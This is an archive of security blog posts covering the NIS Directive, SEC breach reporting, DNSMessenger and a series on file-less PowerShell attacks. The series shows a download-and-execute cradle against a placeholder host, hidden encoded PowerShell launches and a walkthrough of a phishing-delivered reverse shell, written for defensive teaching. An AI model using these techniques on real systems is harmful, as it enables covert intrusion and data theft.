All posts by Andy Green

Post-Davos Thoughts on the EU NIS Directive

I’ve been meaning to read the 80-page report published by the World Economic Forum (WEF) on the global risks humankind now faces. They’re the same folks who bring you the once a year gathering of the world’s bankers and other lesser humanoids held at a popular Swiss ski resort. I was told there was an interesting section on … data security.

And there was. Data security is part of a report intended to help our world leaders also grapple with climate change, nuclear annihilation, pandemics, economic meltdowns, starvation, and  terrorism.

How serious a risk are cyber attacks?

In terms of impact, digital warfare makes the WEF top-ten list of global issues, ranking sixth, between water and food crises, and beating out the spread of infectious diseases in tenth place. It’s practically a fifth horseman of the apocalypse.

Some of the worrying factoids that the WEF brought to the attention of presidents, prime ministers, chancellors, and kings were that in 2016 over 350 million malware variants were unleashed on the world, and that by 2020, malware may find its way onto over 8.4 billion IoT devices.

There are about 7.6 billion of us now, and so we’ll soon be outnumbered by poorly secured, internet-connected, silicon-based gadgets. It’s not a very comforting thought.

The WEF then tried to calculate the economic damage of malware. One study they reference puts the global cost at $8 trillion over the next five years.

The gloomy WEF authors single out the economic impact of ransomware. Petya and NotPetya were responsible for large costs to many companies in 2017. Merck, FedEx, and Maersk, for example, each reported offsets to their bottom line of over $300 million last year as a result of NotPetya attacks.

Systemic Risk: We’re All Connected

However, the effects of malware extend beyond economics. One of the important points the report makes is that hackers are also targeting physical infrastructure.

WannaCry was used against the IT systems of railway providers, car manufacturers, and energy utilities. In other words, cyberattacks are disrupting the real world: lights going out, transportation halted, or factory lines shut down, all because of malware.

And here’s where the WEF report gets especially frightening. Cyber attacks can potentially start a chain reaction of effects that we humans are not good at judging. They call it “systemic risk.”

They put it this way:

“Humanity has become remarkably adept at understanding how to mitigate countless conventional risks that can be relatively easily isolated and managed with standard risk management approaches. But we are much less competent when it comes to dealing with complex risks in systems characterized by feedback loops, tipping points and opaque cause-and-effect relationships that can make intervention problematic.”

You can come up with your own doomsday scenarios – malware infects stock market algorithms leading to economic collapse and then war – but the more important point, I think, is that our political leaders will be forced to start addressing this problem.

And yes, I’m talking about more regulations or stricter standards for the IT systems used to run our critical infrastructure.

NIS Directive

In the EU, the rules of the road for protecting this infrastructure are far more evolved than in the US. We wrote about the Network and Information Security (NIS) Directive way back in 2016 when it was first approved by the EU Parliament.

The Directive asks EU member states to improve co-operation regarding cyber-attacks against critical sectors of the economy — health, energy, banking, telecom, transportation, as well as some online businesses — and to set minimum standards for cyber security preparedness, including incident notification to regulators. The EU countries had 21 months to “transpose” the directive into national laws.

That puts the deadline for these NIS laws at May 2018, which is just a few months away. Yes, May will be a busy month for IT departments as both the GDPR and NIS go into effect.

For example, the UK recently ended the consultation period for its NIS law. You can read the results of the report here. One key thing to keep in mind is that each national data regulator or authority will be asked to designate operators of “essential services”, EU-speak for critical infrastructure. They have six months, starting in May, to do this.

Anyway, the NIS Directive is a very good first step in monitoring and evaluating malware-based systemic risk. We’ll keep you posted as we learn more from the national regulators as they start implementing their NIS laws.

 

 

Adventures in Malware-Free Hacking, Part III

After yakking in the last two posts about malware-free attack techniques, we’re ready to handle a dangerous specimen. The Hybrid Analysis site is the resource I rely on to find these malware critters. While the information that HA provides for each sample —system calls, internet traffic, etc. — should be enough to satisfy a typical IT security pro, there is some value in diving into one of these heavily obfuscated samples to see what’s actually going on.

If you’re playing along at home, I suggest doing this in a sandbox, such as an AWS instance, or, if you’re working on your own laptop, just make sure to comment out the system calls that launch PowerShell.

Into the Obfuscated VBA Muck

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. As I mentioned last time, to see the actual script, you’ll need Frank Boldewin’s OfficeMalScanner.

After extracting the script, which I gave you a peek at in the last post, I decided to load the thing into the MS Word macro library. And then — gasp — stepped through it using the built-in debugger.

My goal was to better understand the obfuscations: to play forensic analyst and experience the frustrations involved in this job.

If you’re going into one of these obfuscated scripts for the first time in a debugger, you’ll likely be gulping espressos as you make your way through the mind-numbingly complex code and stare blankly at the variable L_JEK being assigned the string “77767E6C797A6F6”.

It’s that much fun.

What I learned with this obfuscated VBA script is that only a very small part of it does any of the real work. Most of the rest is there to throw you off the trail.

Since we’re getting into the nitty-gritty, I took a screen shot of the teeny part of the code that performs the true evil work of setting up the PowerShell command line that is ultimately launched by the VBA macro.

Tricky: just take the hex value and subtract 7 for the real ascii.

It’s very simple. The VBA code maintains a hex representation of the command line in a few variables and then translates it to a character string. The only “tricky” part is that hex values have been offset by 7.

So for example, the first part of the hex string comes from L_JEK (above). If you take 77 and subtract 7, you’ll get a hex 70. Do the same for 76 and you obtain hex 6F. Look these up in any ascii table, and you’ll see they map to the first two letters of “powershell”.
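Here’s a minimal PowerShell sketch of that decode step — my own reconstruction for illustration, not the sample’s actual VBA (the value below is just the first few hex pairs shown above):

# Undo the obfuscation: read each hex pair, subtract 7, and convert to its ascii character
$L_JEK = "77767E6C797A6F"
$plain = ""
for ($i = 0; $i -lt $L_JEK.Length; $i += 2) {
    $byte = [Convert]::ToInt32($L_JEK.Substring($i, 2), 16)   # one hex pair
    $plain += [char]($byte - 7)                               # remove the +7 offset
}
$plain   # -> "powersh"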

This ain’t a very clever obfuscation, but it doesn’t have to be!

All it has to accomplish is getting past virus scanners searching for obvious keywords or their ascii representations.  And this particular sample does this well enough.

Finally, after the code builds the command line, it then launches it through the CreateProcess function (below).

Either comment out system calls or set a breakpoint before it.

Think about it. A Word doc was sent in a phish mail to an employee. When the doc is opened, this VBA script  automatically launches a PowerShell session to start the next phase of the attack. No binaries involved, and the heavily obfuscated scripts will evade scanners.

Evil!

To further my own education, I pulled out another macro from Hybrid Analysis (below) just to see what else is out there. This second one effectively does the same thing as the code above.

Secret code embedded in VBA.

It’s a little more clever in how it builds the command line. There’s a decode function, called “d”, that filters out characters from a base string by comparing against a secondary string.

It’s a high-school level idea, but it gets the job done: it will evade scanners and fool IT folks who are quickly scanning the logs for unusual activity.
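To give you the flavor, here’s my own guess at how such a filter might work — an illustrative sketch with made-up strings, not the sample’s actual “d” function:

# Keep only the characters of the base string that don't appear in the junk string
function d($base, $junk) {
    -join ($base.ToCharArray() | Where-Object { $junk.IndexOf($_) -lt 0 })
}
d "p1o2w3e4r5s6h7e8l9l" "0123456789"   # -> "powershell"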

Next Stop

In my first series of posts on obfuscation, I showed that Windows Event logging captures enough details of PowerShell sessions — that is, if you enable the appropriate modules — to do a deep analysis after the fact.
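If you haven’t switched that logging on, here’s one way to do it — a sketch that assumes admin rights on a default Windows setup (Group Policy is the more manageable route in production):

# Enable PowerShell script block logging via the registry (same effect as the Group Policy setting)
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1
# Logged script blocks then show up as event ID 4104 in the Microsoft-Windows-PowerShell/Operational log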

Of course, the brilliance of malware-free attacks is that it’s hard to determine, just by scanning event logs and parsing the command line, whether a PowerShell script is doing anything evil at run-time.

Why?

PowerShell sessions are being launched all the time, and one hacker’s PowerShell poison can be close to another IT admin’s PowerShell power tool. So if you want to alert every time a script downloads something from the Internet, you’ll be sending out too many false positives.
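To see why, compare the hacker’s downloader with what a perfectly ordinary admin script might do — the primitives are identical (URL and path below are placeholders):

# A routine, legitimate download that any ops script might perform ...
Invoke-WebRequest -Uri 'https://example.com/tools/agent.msi' -OutFile 'C:\Temp\agent.msi'
# ... which looks an awful lot like a first-stage payload fetch to a naive alerting rule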

Of course, this leads to this blog’s favorite topic: the failure of perimeter defenses to stop phishing and FUD malware, and the power of User Behavior Analytics.

In short: it’s a losing battle trying to stop hackers from getting past perimeter defenses. The better strategy is to spot unusual file access and application behaviors, and then respond by de-activating accounts or taking other breach response measures.

That’s enough preaching for the day. In the next post, we’ll take a closer look at more advanced types of malware-free attacks.

SEC Guidance on Cyber Incidents and Risk Disclosures

You know, because you read it here in the IOS blog, that in the US data breach reporting is not nearly as strict and comprehensive as in the EU. At the federal level, we have tough rules for reporting incidents involving medical data (HIPAA) and less tough ones for financial data (GLBA). At the state level, there is a patchwork of notification laws for the exposure of a select set of identifiers. And that’s it!

Well not quite.

Realizing that cyber incidents can have an impact on the corporate bottom line, the SEC released official guidance a few years back on reporting cyber security events to investors. For all my financial accountant readers, this information can be found here.

Starting in 2012, publicly traded companies are supposed to acknowledge the consequences of cyber catastrophes in their SEC filings. In describing these incidents, they need to take into account both the direct and indirect costs involved in remediation, litigation, reputation damage, and lost revenues.

When, What, and Where to Report

In general, you’re supposed to report only incidents that will have a “material impact”. This is lawyer talk for eliminating simple hacks — a hacker got into a single email account — while covering news that a “reasonable” investor would want to know about: for example, 100 million social security numbers were taken by a stealthy APT group.

However, there are exceptions.

If a cyber incident was widely reported in the news, then the company needs to file with the SEC regardless of the seriousness of the incident. Also, any breaches that involved notifying a state or federal (HIPAA, GLBA, COPPA) regulator would require an SEC filing.

What information do you need to disclose?

You have some wiggle room. The SEC recognizes that too much detail might compromise an ongoing investigation. You should describe the nature of the breach at a high level and, in addition, provide an estimate of the number of people impacted, the categories of affected data, the remediation efforts that were taken, and the plans to prevent future incidents.

At a minimum, companies will need to report overall cyber risks they face in their annual 10-Ks. For a serious cyber incident, they should file it as an 8-K immediately — although there’s no specific time window — instead of waiting for the quarterly report.

I’m a blogger, not a lawyer, so if you want legal advice, read this to learn what real attorneys have to say on this subject.

Real-World 8-K Filing

Want to get inspired by an actual 8-K material filing for a cyber event?

Gaze on the screenshot below showing the beginning of a cyber incident description for a health company.

They exist: SEC 8-K filings for data breaches.

One last point about these filings. The SEC’s EDGAR system, where all this information is reported and kept, should in theory be a source of information regarding breach incidents at public companies.

Useful to know! At least for security bloggers and other compliance wonks.

Adventures in Malware-Free Hacking, Part II

I’m a fan of the Hybrid Analysis site. It’s kind of a malware zoo where you can safely observe dangerous specimens captured in the wild without getting mauled. The HA team runs the malware in safe sandboxes and records system calls, files created, and internet traffic, displaying the results for each malware sample. So you don’t necessarily have to spend time puzzling over, or even, gulp, running the heavily obfuscated code to understand the hackers’ intentions.

The HA samples I focused on use either encasing JavaScript or Visual Basic for Applications (VBA) scripts, which are the “macros” embedded in Word or Excel documents attached to phish mails. These scripts then launch a PowerShell session on the victim’s computer. The hackers usually send the PowerShell session a Base64-encoded stream. It’s all very sneaky and meant to make it difficult for monitoring software to find obvious keywords to trigger on.

Mercifully, the HA team decodes the Base64 and displays the plain text. In effect, you don’t really need to focus on how these scripts work because you’ll see the command line of the spawned processes in HA’s “Process launched” section. The screenshots below illustrate this:

Hybrid Analysis captures the Base64-encoded commands sent to a PowerShell process …

… and then decodes it for you. #amazing

In the last post, I created my own mildly obfuscated JavaScript container to launch a PowerShell session.

Then my script, like a lot of PowerShell-based malware, downloads a second PowerShell script from a remote web site. To do this safely, my dudware downloads a harmless one-line PS script that prints out a message.

This being the IOS blog, we never, ever do anything nice and easy. Let’s take my scenario a step further.

PowerShell Empire and Reverse Shells

One of the goals of this exercise is to show how (relatively) easy it is for a hacker to get around legacy perimeter defenses and scanning software. If a non-programming security blogger such as myself can cook up potent fully undetectable (FUD) malware in a couple of afternoons (with help from lots of espressos), imagine what a smart Macedonian teenager can do!

And if you’re an IT security person who needs to convince a stubborn manager – I know they don’t exist, but let’s say you have one – that the company needs to boost its secondary defenses, my malware-free attack example might do the trick.

I’m not suggesting you actually phish management, though you could. If you take this route and use my scripts, the message that prints on their laptops would count as a cybersecurity “Boo!”.  It may be effective in your case.

But if your manager then challenges you by saying, “so what”, you can then follow up with what I’m about to show you.

Hackers want to gain direct access to the victim’s laptop or server. We’ve already reviewed how Remote Access Trojans (RATs) can be used to sneakily send and download files, issue commands, and hunt for valuable content.

However, you don’t have to go that far. It’s very easy to gain shell access, which for certain situations might be all a hacker requires – to get in and get out with a few sensitive files from the CEO’s laptop.

Remember the amazing PowerShell Empire post-exploitation environment that I wrote about?

It’s a, cough, pen testing tool that, among its many features, lets you easily create a PowerShell-based reverse shell. You can learn more about this on the PSE site.

Let’s take a quick walk through. I set up my malware testing environment within my AWS infrastructure so I can work safely. And you can do the same to show management a PoC (and not get fired for running grey-area hacking software on the premises).

If you bring up the main console of PowerShell Empire, you’ll see this:

First, you configure a listener on your hacking computer. Enter the “listener” command, and follow up with “set Host” and the IP address of your system — that’s the “phone home” address for the reverse shell. Then launch the listener process with an “execute” command (below). The listener forms one end of your shell connection.

For the other end, you’ll need to generate agent-side code by entering the “launcher” command (below). This generates code for a PowerShell agent — note that it’s Base64-encoded — and will form the second stage of the payload. In other words, my JavaScript encasing code from last time will now pull down the PowerShell launcher agent, instead of the harmless code that outputs “Evil Malware”, and connect back to the remote listener in reverse-shell fashion.

Reverse-shell magic. This encoded PowerShell command will connect back to the remote listener and set up a shell.

To run this experiment, I played the part of an innocent victim and clicked on Evil.doc, which is the JavaScript I set up last time. Remember? The PowerShell was configured not to pop up a window, so the victim won’t notice anything unusual is going on. However, if you look at the Windows Task Manager, you’ll see the background PowerShell process, which may not trigger alarms ’cause it’s just PowerShell, right?

Now when you click on Evil.doc, a hidden background process will connect to the PowerShell Empire agent.

Putting on my hacker-pentester hat, I returned to my PowerShell Empire console, and now see the message that my agent is active.

I then issued an interact command to pop up a shell in PSE. And I’m in! In short: I hacked into the Taco server that I set up once upon a time.

What I just described is not a lot of work. If you’re doing this for kicks during a long lunch hour or two to improve your infosec knowledge, it’s a great way to see how hackers get around border security defenses and stealthily lurk in your system.

And IT managers who believe that they’ve built breach-proof defenses may, fingers crossed, find this enlightening – if you can convince them to sit down long enough.

Let’s Go Live

As I’ve been suggesting, real-world malware-free hacking is just a variation on what I just presented. To get a little bit of a preview of the next post, I searched for a Hybrid Analysis specimen that works in a similar fashion to my made-up sample. I didn’t have to search very long – there’s lots of this attack technique on their site.

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. So instead of faking the doc extension, which I did for my JavaScript example, this malware-free malware is really, truly, a Microsoft document.

If you’re playing along at home, I picked this sample, called rfq.doc.

I quickly learned you often can’t directly pull out the actual evil VBA scripts. The hackers compressed or hid them, and they won’t show up in Word’s built-in macro tools.

You’ll need a special tool to extract it. Fortunately, I stumbled upon Frank Boldewin’s OfficeMalScanner. Danke, Frank.

Using this tool, I pulled out the heavily obfuscated VBA code. It looks a little bit like this:

Obfuscation done by pros. I’m impressed!

Attackers are really good at obfuscation, and my effort in creating Evil.doc was clearly the work of a rank amateur.

Anyway, next time we’ll get out our Word VBA debuggers, delve into this code a little bit, and compare our analysis to what HA came up with.

Continue reading the next post in "Malware-Free Hacking"

Adventures in Malware-Free Hacking, Part I

When I first started looking into the topic of hackers living off the land by using available tools and software on the victim’s computer, little did I suspect that it would become a major attack trend. It’s now the subject of scary tech headlines, and security pros are saying it’s on the rise. It seems like a good time for a multi-part IOS blog series on this subject.

Known also as file-less or zero-footprint attacks, malware-free hacking typically uses PowerShell on Windows systems to stealthily run commands to search for and exfiltrate valuable content. To IT security teams monitoring for hacker activities, file-less attacks are very difficult to spot, often evading virus scanners and other signature-based detection systems.

In short, legacy defenses can’t really deal with this style of attack. Of course, there is, ahem, security software that will spot the malware activity on file systems.

Anyway, I’ve written about  some of these ideas before in my PowerShell obfuscation series, but more from a theoretical view. Then I discovered the Hybrid Analysis site, where you can find uploaded samples of malware captured in the wild.

Wild PowerShell

I thought it would be a great place to look for some file-less malware specimens. I wasn’t disappointed. By the way, if you want to go on your own malware hunting expedition, you’ll have to be vetted by the Hybrid Analysis folks so they know you’re doing white hat work. As a blogger who writes about security, I passed with flying colors. I’m sure you will too.

Besides having samples, they also provide great insights into what the malware is doing. Hybrid Analysis runs the submitted malware in their own sandbox, and monitors for system calls, processes launched, and Internet activity, as well as pulling out suspicious text strings.

For binaries and other executables in particular, where you can’t even look at the actual high-level code, this container technique allows HA to decide whether the malware is evil or merely suspicious based on its run-time activity. And then they’ll rate the sample.

For the malware-free PowerShell and other scripting samples (Visual Basic, JavaScript, etc.) I was looking for, I could see the actual code. For example, I came across this PowerShell creature:

You too can run base64 encoded PowerShell to evade detection. Note the use of the Noninteractive parameter in this live sample from Hybrid Analysis.

If you’ve read my obfuscation posts, you’ll know that the -e parameter indicates that what follows is base64 encoded. By the way, Hybrid Analysis helpfully provides the decoded PowerShell as well. If you want to try decoding base64 PS on your own, you can run this command to do the work:

$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

Getting in Deeper

I decoded the script using this technique, and you can see the resulting plaintext PowerShell malware below.

Note the time sensitivity of this PS malware, and the use of cookies to pass back more information. I modified this real-world sample in my own testing.

I was feeling a little nervous handling this live malware on my own laptop. Attention Varonis IT Security: please note that I worked with an on-line PowerShell console and also my own separate AWS environment. Got that, IT?

Anyway, we’ve seen this particular attack style before —  in the PS obfuscation series — wherein the base64 encoded PS is itself pulling more of the malware from another site, creating a .Net Framework WebClient object to do the heavy lifting.
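That pattern boils down to a couple of lines of PowerShell. Here’s a harmless sketch with a placeholder URL — not the actual payload from the sample:

# Download a second-stage script as a string and run it directly in memory -- nothing is written to disk
$stage2 = (New-Object System.Net.WebClient).DownloadString('http://example.com/stage2.ps1')
Invoke-Expression $stage2   # a.k.a. IEX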

Why this approach?

For security software that’s scanning the Windows event log, the base64 encoding prevents text-based pattern matching from doing some easy detection – matching on, say, the string “WebClient”. And since the real evil part of the malware is then downloaded and injected into the PS app itself, this approach completely evades detection. Or so I thought.

It turns out with more advanced Windows PowerShell logging enabled – see my post — you can effectively see the downloaded string in the event log. I commend Microsoft (as did others!) for this added level of logging.

However, hackers then responded by base64 encoding the downloaded PowerShell from the remote site, so it would then show up in the Windows event log like the encoded sample above. Makes sense, right?
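For reference, producing that kind of encoded payload takes a single line. Here’s a sketch using a harmless command — note that the -e/-EncodedCommand flag expects UTF-16LE, which is why the Unicode encoding is used:

# Encode a PowerShell command the way the -e flag expects it
$cmd = 'Write-Host "Evil Malware"'
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($cmd))
# The payload would then run with something like: powershell.exe -NonInteractive -WindowStyle Hidden -e $encoded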

Adding More Scripting Sauce

The real-world samples in Hybrid Analysis then take this idea a step further. Hackers cleverly hide this PowerShell attack in Microsoft Office macros written in Visual Basic and in other scripts. The idea is that the victim receives a phish mail from, say, FedEx, with a Word doc described as an invoice. She then clicks on the doc, which launches a macro that eventually launches the actual PowerShell.

Oftentimes, the Visual Basic script itself is obfuscated so that it evades virus and malware scanners.

Yes, it’s complicated and evil. And I’m only doing a very shallow dive.

In the spirit of the above, I decided as a training exercise to encase the above PowerShell within some obfuscated JavaScript. You can see the results of my hacking handiwork:

Obfuscated JavaScript hiding the encoded PowerShell. Real hackers, of course, do this better than me.

There is one technique I borrowed from “in the wild” samples: the use of WScript.Shell to launch the actual encoded PowerShell. It’s the way you get out of the script environment to interact with the rest of the system.
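WScript.Shell is just a COM object, so you can poke at the same mechanism from a PowerShell prompt to see what the encasing script is doing — a harmless sketch (real samples pass “-e <base64>” instead of my toy command):

# The same Run() call the encasing JavaScript uses; window style 0 keeps the window hidden
$shell = New-Object -ComObject WScript.Shell
$shell.Run('powershell -NonInteractive -Command "Write-Output Boo"', 0, $false) | Out-Null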

By the way, JavaScript is on its own a vehicle for delivering malware. Many Windows environments have the Windows Script Host enabled by default, which will directly run JS. In this scenario, the encasing JS malware is attached as a file with a .doc.js suffix. Windows will only show the first suffix, so it will appear to the victim as a Word doc. The JS icon is rendered as a scroll-like graphic. Not surprisingly, people will click on this attachment thinking it’s a document.

Don’t click on that JS icon that resembles a scroll! It will download evil malware. You’ve been warned.

For my own encasing JavaScript malware, I modified the PowerShell sample above to download a script from a web site I control. The remote PS script merely prints out “Evil Malware”.

Not very evil.

Of course, real hackers are interested in gaining access to a laptop or server, say, through a shell.

In the next post, I’ll show how to do this by using PowerShell Empire, which I wrote about once upon a time.

We probably dove a little too deep for an introductory post, so I’ll let you catch your breath and cover some of this again next time. And then we can start grokking real-world malware-free attacks with the preliminaries out of the way.

 

Continue reading the next post in "Malware-Free Hacking"

Our Most Underappreciated Blog Posts of 2017

Another year, another 1,293 data breaches involving over 174 million records. According to our friends at the Identity Theft Resource Center, 2017 made history by breaking 2016’s record-setting 1,091 breaches. Obviously it’s been a year that many who directly defend corporate and government systems will want to forget.

Before we completely wipe 2017 from our memory banks, I decided to take one last look at the previous 12 months’ worth of IOS posts. While there are more than a few posts that did not receive the traffic we had hoped for, they nevertheless contained some really valuable security ideas and practical advice.

In no particular order, here are my favorite underachieving posts of the 2017 blogging year.

Interviews

Wade Baker Speaks – We did a lot of interviews with security pros this year —researchers, front-line IT warriors, CDOs, privacy attorneys.  But I was most excited by our chat with Wade Baker. The name may not be familiar, but for years Baker produced the Verizon DBIR, this blog’s favorite source of breach stats. In this transcript, Wade shares great data-driven insights into the threat environment, data breach costs, and how to convince executives to invest in more data security.

Ann Cavoukian and GDPR – It’s hard to believe that the General Data Protection Regulation (GDPR) is only a few months away. You can draw a line from Cavoukian’s Privacy by Design ideas to the GDPR.  For companies doing business in the EU, it will soon be the case that PbD will effectively be the law. Read the Cavoukian transcript to get more inspired.

Diversity and Data Security – The more I learn about data security and privacy, the more I’m convinced that it will “take a village”.  The threat is too complex for it to be pigeon-holed into an engineering problem. A real-world approach will involve multiple disciplines — psychology, sociology, law, design, red-team thinking, along with computer smarts. In this interview with Allison Avery, Senior Organizational Development & Diversity Excellence Specialist at NYU Langone Medical Center, we learn that you shouldn’t have preconceived notions of who has the right cyber talents.

Infosec Education

PowerShell Malware –  PowerShell is a great next-generation command line shell. In the last few years, hackers have realized this as well and are using PowerShell for malware-free hacking. A few months ago I started looking into obfuscated PowerShell techniques, which allow hackers to hide the evil PowerShell and make it almost impossible for traditional scanners to detect. This is good information for IT people who need to get a first look at the new threat environment. In this two-part series, I referenced a Black Hat presentation given by Lee Holmes — yeah, that guy!  Check out Lee’s comment on the post.

Varonis and Ransomware – This was certainly the year of weaponized ransomware, with WannaCry, Petya, et al. using the NSA-discovered EternalBlue exploit to hold data hostage on a global scale. In this post, we explain how our DatAlert software can be used to detect PsExec, which is used to spread the Petya variant of the malware. And in this other ransomware post, we also explain how to use DatAlert to detect the mass encryption of files and to limit your risks after a ransomware infection.

PowerShell as a Cyber Monitoring Tool – I spent a bit of effort in this long series explaining how to use PowerShell to classify data and monitor events — kind of a roll-your-own Varonis. Alas, it didn’t get the exposure I had hoped. But there are some really great PowerShell tips, and sample code using Register-EngineEvent to monitor low-level file access events. A must read if you’re a PowerShell DIY-er.

Compliance

NIS, the Next Big EU Security Law – While we’ve all been focused on the EU GDPR, there are more EU data security rules that go into effect in 2018. For example, the Network and Information Security (NIS) Directive. EU countries have until May 2018 to “transpose” this directive into their own national laws. Effectively, the NIS Directive asks companies involved in critical infrastructure — energy, transportation, telecom, and Internet — to have data security procedures in place and to notify regulators when there’s a serious cyber incident. Unlike the GDPR, this directive is not just about data exposure but covers any significant cyber event, including DoS, ransomware, and data destruction.

GDPR’s 72-Hour Breach Notification – One particular GDPR requirement that’s been causing major headaches for IT is the new breach notification rules. In October, we received guidelines from the regulators. It turns out that there’s more flexibility than was first thought. For example, you can provide EU regulators partial information in the first 72 hours after discovery and more complete information as it becomes available. And there are many instances where companies will not have to additionally contact individuals if the personal data exposed is not financially harmful. It’s complicated, so read this post to learn the subtleties.

By the way, we’ve been very proud of our GDPR coverage. At least one of our posts has been snippetized by Google, which means that at least Google’s algorithms think our GDPR content is the cat’s meow. Just sayin’.

Podcasts

Man vs. Machine – Each week Cindy Ng leads a discussion with a few other Varonians, including Mike Buckbee, Killian Englert, and Kris Keyser. In this fascinating podcast, Cindy and her panelists take on the question of ethics in software and data security design. We know all too well that data security is often not thought about when products are sold to consumers — maybe afterwards, after a hack. We can and should do a better job in training developers and introducing better data laws, for example the EU GDPR. But what is “good enough” for algorithms that think for themselves in, say, autonomous cars? I don’t have the answer, but it is great fun listening to this group talk about this issue.

Cybercrime Startups – It’s strange at first to think of hackers as entrepreneurs and their criminal team as a startup. But in fact there are similarities, and hacking in 2017 starts looking like a viable career option for some. In this perfect drive-time podcast, our panelists explore the everyday world of the cybercrime startup.

Fun Security Facts

Securing S3 – As someone who uses Amazon Web Services (AWS) to quickly test out ideas for blog posts, I’m a little in awe of Amazon’s cloud magic and also afraid to touch many of the configuration options. Apparently, I’m not the only one who gets lost in AWS, since there have been major breaches involving its heavily used data storage feature, known as S3. In this post, Mike covers S3’s buckets and objects and explains how to set up security policies. Find out how to avoid being an S3 victim in 2018!

DNSMessenger: 2017’s Most Beloved Remote Access Trojan (RAT)

I’ve written a lot about Remote Access Trojans (RATs) over the last few years. So I didn’t think there was that much innovation in this classic hacker software utility. RATs, of course, allow hackers to get shell access and issue commands to search for content and then stealthily copy files. However, I somehow missed DNSMessenger, a new RAT variant that was discovered earlier this year.

The malware runs when the victim clicks on a Word doc embedded in an email – it’s contained in a VBA script that then launches some PowerShell. Nothing that unusual so far in this phishing approach.

Ultimately, the evil RAT payload is set up in another launch stage. The DNSMessenger RAT is itself a PowerShell script. The way the malware unrolls is intentionally convoluted and obfuscated to make it difficult to spot.

And what does this PowerShell-based RAT do?

RAT Logic

No one’s saying that a RAT has to be all that complicated. The main processing loop accepts messages that tell the malware to execute commands and send results back.

Here’s a bit of DNSMessenger code to probe the DNS servers. The addresses are hardcoded.

The clever aspect of DNSMessenger is that — surprise, surprise — it uses DNS as the C2 server to query records from which it pulls in the commands.
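To get a feel for why DNS makes such a convenient command channel, here’s a toy illustration in PowerShell — my own sketch with a placeholder domain, not DNSMessenger’s actual code (Resolve-DnsName ships with recent Windows versions):

# Ask a resolver for the TXT record of a domain the attacker controls
$answer = Resolve-DnsName -Name 'c2.example.com' -Type TXT
$answer.Strings   # whatever text the attacker published there -- e.g. an encoded command to execute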

It’s a little more complicated than what I’m letting on, and if you want, you can read the original analysis done by Cisco’s Talos security group.

Stealthy RAT

As noted by security pros, DNSMessenger is effectively “file-less” since it doesn’t have to save any commands from the remote server onto the victim’s file system. Because it uses PowerShell, DNSMessenger is very difficult to detect when it’s running. Using PowerShell also means that virus scanners won’t automatically flag the malware.

This is right out of the malware-less hacking cookbook.

Making it even more deadly is its use of the DNS protocol, which is not one of the usual protocols on which network filtering and monitoring is performed — such as HTTP or HTTPS.

A tip of the (black) hat to the hackers for coming up with this. But that doesn’t mean that DNSMessenger is completely undetectable. The malware does have to access the file system as commands are sent via DNS to scan folders and search for monetizable content. Varonis’s UBA technology would spot anomalies on the account under which DNSMessenger is running.

It would be great if it were possible to connect the unusual file-access activity to the DNS exfiltration being done by DNSMessenger. Then we’d have hard proof of an incident in progress.

Varonis Edge

We’ve recently introduced Varonis Edge, which is specifically designed to look for signs of attack at the perimeter, including VPNs, Web Security Gateways, and, yes, DNS.

As I mentioned in my last post, malware-free hacking is on the rise and we should expect to see more of it in 2018.

It would be a good exercise to experiment with and analyze a DNSMessenger-style trojan. I can’t do it this month, but I am making it my first New Year’s resolution to try experimenting in January in my AWS environment.

In the meantime, try a demo of Varonis Edge to learn more.

Data Security 2017: We’re All Hacked

Remember more innocent times back in early 2017? Before Petya, WannaCry, leaked NSA vulnerabilities, Equifax, and Uber, the state of data security was anything but rosy, but I suppose there were more than a few of us left — consumers and companies — who could say that security incidents had not had a direct impact.

That has changed after Equifax’s massive breach affecting 145 million American adults — I was a victim — and then a series of weaponized ransomware attacks that held corporate data hostage on a global scale.

Is there any major US company that hasn’t been affected by a breach?

Actually, ahem, no.

According to security researcher Mikko Hyppönen, all 500 of the Fortune 500 have been hacked. He didn’t offer evidence, but another cybersecurity research company has some tantalizing clues. A company called DarkOwl scans the dark web for stolen PII and other data, and traces it back to the source. They have strong evidence that all of the Fortune 500 have had data exposed at some point.

We Had Been Warned

Looking over past IOS blog posts, especially for this last year, I see the current massive breach pandemic as completely expected.

Back in 2016, we spoke with Ken Munro, the UK’s leading IoT pen tester. After I got over the shock of learning that WiFi coffee makers and Internet-connected weighing scales actually exist, Munro explained that Security by Design is not really a prime directive for IoT gadget makers.

Or as he put it, “You’re making a big step there, which is assuming that the manufacturer gave any thought to an attack from a hacker at all.”

If you read a post from his company’s blog from October 2015 about hacking into an Internet-connected camera, you’ll see all the major ingredients of a now familiar pattern:

  1. Research a vulnerability or (incredibly careless) backdoor in an IoT gadget, router, or software;
  2. Take advantage of exposed external ports to scan for suspect hardware or software;
  3. Enter the target system from the Internet and inject malware; and
  4. Hack the system, and then spread the malware in worm-like fashion.

This attack pattern (with some variation) was used successfully in 2016 by Mirai, and in 2017 by Pinkslipbot and WannaCry.

WannaCry, though, introduced two new features not seen in classic IoT hacks: an unreported vulnerability – aka Eternal Blue – taken from the NSA’s top-secret TAO group and, of course, ransomware as the deadly payload.

Who could have anticipated that NSA code would make its way to the bad guys, who then use it for their evil attacks?

Someone was warning us about that as well!

In January 2014, Cindy and I heard crypto legend Bruce Schneier talk about data security post-Snowden. Schneier warned us that the NSA wouldn’t be able to keep its secrets and that eventually their code would leak or would be re-engineered by hackers. And that is exactly what happened with WannaCry.

Here are Schneier’s wise words:

“We know that technology democratizes. Today’s secret NSA program, becomes tomorrow’s PhD thesis, becomes the next day’s hacker tool.”

Schneier also noted that many of the NSA’s tricks are based on simply getting around cryptography and perimeter defenses. In short, the NSA hackers were very good at finding ways to exploit our bad habits in choosing weak passwords, not keeping patches up to date, or not changing default settings.

It ain’t advanced cryptography (or even rocket science).

In my recent chat with Wade Baker, the former Verizon DBIR lead, I was reminded of this KISS (keep it simple, stupid) principle, but he had the hard statistical evidence to back it up. Wade told me most attacks are not sophisticated, but take advantage of unforced user errors.

Unfortunately, even in 2017, companies are still learning how to play the game. If you want a prime example of a simple attack, you have only to look at 2017’s massive Equifax breach, which was the result of a well-known bug in the company’s Apache Struts installation, which remained unpatched!

Weapons of Malware Destruction

